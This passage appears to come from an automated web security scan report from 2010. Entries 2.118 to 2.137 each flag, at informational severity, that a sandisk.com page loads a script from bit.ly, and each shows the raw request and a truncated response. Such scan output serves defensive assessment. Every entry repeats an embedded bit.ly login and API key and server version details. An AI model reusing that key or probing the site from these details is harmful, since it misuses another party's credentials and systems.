http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/usb-flash-drives.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37014
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.118. http://www.sandisk.com/business-solutions/usb-flash-drives/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/usb-flash-drives/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/usb-flash-drives/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37010
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.119. http://www.sandisk.com/business-solutions/usb-flash-drives/clear-case-ufd.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/usb-flash-drives/clear-case-ufd.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/usb-flash-drives/clear-case-ufd.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/usb-flash-drives
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.120. http://www.sandisk.com/business-solutions/usb-flash-drives/core-module previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/usb-flash-drives/core-module

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/usb-flash-drives/core-module HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/usb-flash-drives
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36384
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.121. http://www.sandisk.com/business-solutions/usb-flash-drives/core-module.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/business-solutions/usb-flash-drives/core-module.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /business-solutions/usb-flash-drives/core-module.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/usb-flash-drives
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36389
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.122. http://www.sandisk.com/consumer-products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /consumer-products HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19800
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.123. http://www.sandisk.com/consumer-products/camcorder previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/camcorder

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /consumer-products/camcorder HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40474
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.124. http://www.sandisk.com/consumer-products/camera previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/camera

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /consumer-products/camera HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40733
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:38 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.125. http://www.sandisk.com/consumer-products/computing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/computing

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /consumer-products/computing HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41062
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.126. http://www.sandisk.com/consumer-products/computing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/computing/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /consumer-products/computing/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41063
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.127. http://www.sandisk.com/consumer-products/computing/ssd-landing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/computing/ssd-landing

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /consumer-products/computing/ssd-landing HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/ssd/landing
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34308
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.128. http://www.sandisk.com/consumer-products/dslr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/dslr

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /consumer-products/dslr HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40829
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.129. http://www.sandisk.com/consumer-products/gaming previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/gaming

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /consumer-products/gaming HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39989
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.130. http://www.sandisk.com/consumer-products/mobile-memory previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/mobile-memory

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /consumer-products/mobile-memory HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39931
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.131. http://www.sandisk.com/consumer-products/music-player previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/consumer-products/music-player

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /consumer-products/music-player HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42311
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:41 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.132. http://www.sandisk.com/css/MediaPlayer_img/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/css/MediaPlayer_img/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /css/MediaPlayer_img/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.133. http://www.sandisk.com/flash/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/flash/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /flash/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:42:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.134. http://www.sandisk.com/global-sites previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/global-sites

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /global-sites HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15922
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.135. http://www.sandisk.com/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/homepage

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /homepage HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 28452
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:40:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.136. http://www.sandisk.com/media/100759/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sandisk.com
Path:	/media/100759/

Issue detail

The response dynamically includes the following script from another domain:

http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9

Request

GET /media/100759/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 16 Nov 2010 23:40:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12579

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...

<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...

2.137. http://www.sandisk.com/media/100764/ previous next

Summary

Severity:	Information
Confidence:	Certain
